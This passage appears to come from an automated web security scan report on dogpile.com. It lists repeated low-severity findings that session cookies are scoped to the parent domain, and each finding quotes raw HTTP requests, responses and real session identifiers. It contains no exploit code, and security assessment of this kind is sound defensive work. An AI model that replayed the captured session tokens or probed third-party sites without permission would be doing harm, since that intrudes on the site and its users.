DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=91f95e6548a4490186bdc16a3af0cb01&ActionId=62fda6b6aa3440d49bc7c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:15:44 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:55:44 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://dogpile.com/dogpile/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=bc343352182e410c9000c16a3af0cb01&ActionId=91f95e6548a4490186bdc16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:57 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

6.31. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=58f66cc309544e4c8136c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:47 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:47 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:47 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.32. http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=48a161ef0c404dfb82c8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:52 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:52 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.33. http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=191540b0b4b6493e9fedc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:39 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:39 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:39 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=News/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.34. http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=81608220bc3644438a64c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:38 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:38 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:38 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.35. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=f9207591fc7a45ddb5a6c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:51 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:51 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:51 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.36. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=a2dfd4c239b0441ea9d6c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:46 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:46 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:46 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.37. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=b2ec7d68211642c28148c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:56 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:56 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:56 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.38. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=f61de8d9831c485b9678c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:44 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:44 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.39. http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=4be46901fe6f41908e5ec16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:37 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:37 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:37 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.40. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/preferences/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=0d789ad599844ecb8757c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:06 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:06 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:06 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/preferences/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.41. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=b178c96e1aba4492b2dac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:05 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:05 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.42. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/privacy/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=d08462ba76864b45a153c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:35 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:35 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:35 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/privacy/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.43. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/redir/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=ed5033e7ad35480d9635c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=09595e0bb31848b5a194c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:27 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:27 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:27 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /dogpile_other/ws/redir/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true
Content-Length: 2186
Cache-Control: max-age=0
Origin: http://www.dogpile.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:12 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com

__VIEWSTATE=%2FwEPDwULLTEwNzYxNjAxNjBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBR5pY2VQYWdlJFNlYXJjaEJveFRvcCRxa3dzdWJtaXQFLmljZVBhZ2UkU2VhcmNoQm94VG9wJEFkdmFuY2VkU2VhcmNoV2ViJGluY2x1ZGUFLmljZV
...[SNIP]...

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_other/ws/results/Web/site!3Axss!FEcx/1/417/TopNavigation/Relevance/iq=true/zoom=off/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ed5033e7ad35480d9635c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=09595e0bb31848b5a194c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:27 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:27 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:27 GMT
Connection: close
Content-Length: 258

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_other/ws/results/Web/site!3Axss!FEcx/1/417/TopNavigation/Relevance/iq=true/zoom=off/_i
...[SNIP]...

6.44. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=39b2b41ff5024c0491eec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=03e0e226b781481fa972c16a3af0cb01&ActionId=14be2b84e19340ef829ac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:59 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:59 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:59 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_other/ws/results/Web/Dark%20Sites/1/302360/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=39b2b41ff5024c0491eec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=03e0e226b781481fa972c16a3af0cb01&ActionId=14be2b84e19340ef829ac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:59 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:59 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:59 GMT
Connection: close
Content-Length: 260

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_other/ws/results/Web/Dark%20Sites/1/302360/RightNav/Relevance/iq=true/zoom=off/qlnk=1/
...[SNIP]...

6.45. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=147d5eeccb2149eaadeec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=c1a8f04152fd49d4bbd5c16a3af0cb01&ActionId=afded22df52249fea4b3c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:13 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:13 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:13 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_other/ws/results/Web/Review%20Sites/1/302357/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=147d5eeccb2149eaadeec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=c1a8f04152fd49d4bbd5c16a3af0cb01&ActionId=afded22df52249fea4b3c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:13 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:13 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:15:13 GMT
Connection: close
Content-Length: 262

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_other/ws/results/Web/Review%20Sites/1/302357/RightNav/Relevance/iq=true/zoom=off/qlnk=
...[SNIP]...

6.46. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=eae10ac2cab145b8a2c3c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:00 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:00 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=eae10ac2cab145b8a2c3c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:00 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:00 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:59 GMT
Connection: close
Content-Length: 261

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1
...[SNIP]...

6.47. http://www.dogpile.com/dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
